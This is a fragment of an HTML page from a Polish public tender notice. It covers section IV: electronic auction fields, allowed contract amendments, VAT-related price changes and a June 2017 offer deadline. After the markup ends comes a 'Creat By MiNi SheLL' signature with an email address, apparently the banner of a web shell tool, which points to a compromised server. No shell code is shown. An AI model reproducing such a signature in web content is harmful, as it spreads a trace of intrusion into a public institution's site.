20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">1. Istotne zmiany umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy mogą być dokonane w następujących przypadkach i zakresie:1)	w przypadku wystąpienia konieczności wykonania niezbędnej zmiany materiałów, technologii lub sposobu wykonania zamówienia (prace zamienne), w szczególności wskutek stwierdzenia błędów w szczegółowym opisie przedmiotu zamówienia, przy czym zamiany będą dotyczyły zakresu zamówienia w stopniu nie wykraczającym poza określenie przedmiotu zamówienia zawarte w SIWZ,2)	wskutek zmian obowiązujących przepisów prawnych, mających wpływ na warunki umowy; zmiany będą dokonane w zakresie w jakim konieczne będzie dostosowanie dotychczasowych rozwiązań do nowych regulacji prawnych, 3)	z powodu wystąpienia zdarzeń losowych mających charakter siły wyższej, które uzasadniają wprowadzenie zmian do umowy; przy czym zmiany mogą być dokonane w zakresie:a)	wydłużenia terminu realizacji zamówienia o czas wystąpienia zdarzenia i ewentualnie usuwania jego skutków, b)	zakresu zamówienia w stopniu nie wykraczającym poza określenie przedmiotu zamówienia zawarte w SIWZ, jeżeli wskutek siły wyższej konieczne będzie np. ograniczenie zakresu zamówienia, lub wykonanie dodatkowych czynności związanych z usuwaniem skutków zdarzeń,4)	w razie zlecenia przez zamawiającego wykonania prac zamiennych lub dodatkowych zamówień, które wymagają dodatkowego czasu na wykonanie zamówienia; zmiana może nastąpić w zakresie terminu realizacji zamówienia podstawowego, o czas wykonywania zamówień dodatkowych lub prac zamiennych,5)	w zakresie zmiany terminu realizacji zamówienia, z przyczyn leżących po stronie zamawiającego - przedłużającej się procedury przetargowej, opóźnienia zamawiającego w podpisaniu umowy, w akceptacji próbek, materiałów, lub w zakresie dokonywania odbiorów, o czas przedłużenia lub opóźnienia,6)	w zakresie zmiany terminu realizacji zamówienia, z powodu przedłużających się terminów dostaw materiałów, z przyczyn nie leżących po stronie wykonawcy, przyczyny te muszą być udokumentowane przez wykonawcę,7)	w przypadku, gdy zmiany pozwolą osiągnąć lepsze parametry techniczne, użytkowe, estetyczne od przyjętych w dokumentacji wykonawczej, lub jeżeli zmiany dotyczą zastosowania nowych technologii, materiałów, urządzeń, nieznanych i niedostępnych w momencie zawarcia umowy zmiana może dotyczyć zakresu zamówienia w stopniu nie wykraczającym poza określenie przedmiotu zamówienia zawarte w SIWZ,2. Wynagrodzenie ma charakter ryczałtowy i nie podlega późniejszym zmianom, za wyjątkiem przypadków gdy: 1) Zamawiający zleci Wykonawcy wykonanie prac zamiennych, skutkujących zmianą kosztów prac, zgodnie z podpisanym wcześniej protokołem, wynagrodzenie wykonawcy zostanie zwiększone lub zmniejszone o wartość prac zamiennych, wskazaną w kosztorysie przygotowanym przez wykonawcę i zaakceptowanym przez zamawiającego, 2) nastąpi zmiana obowiązującej stawki podatku od towarów i usług (VAT),3) nie zostanie wykonany pełen zakres przedmiotu zamówienia wskazany w SIWZ - wynagrodzenie wykonawcy zostanie zmniejszone o wartość elementów niewykonanych wskazaną w formularzu cenowym.3. Jeśli o zmianę umowy wnioskuje wykonawca, przedkłada zamawiającemu pisemne uzasadnienie konieczności wprowadzenia zmian do umowy.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2017-06-14</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">PL</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com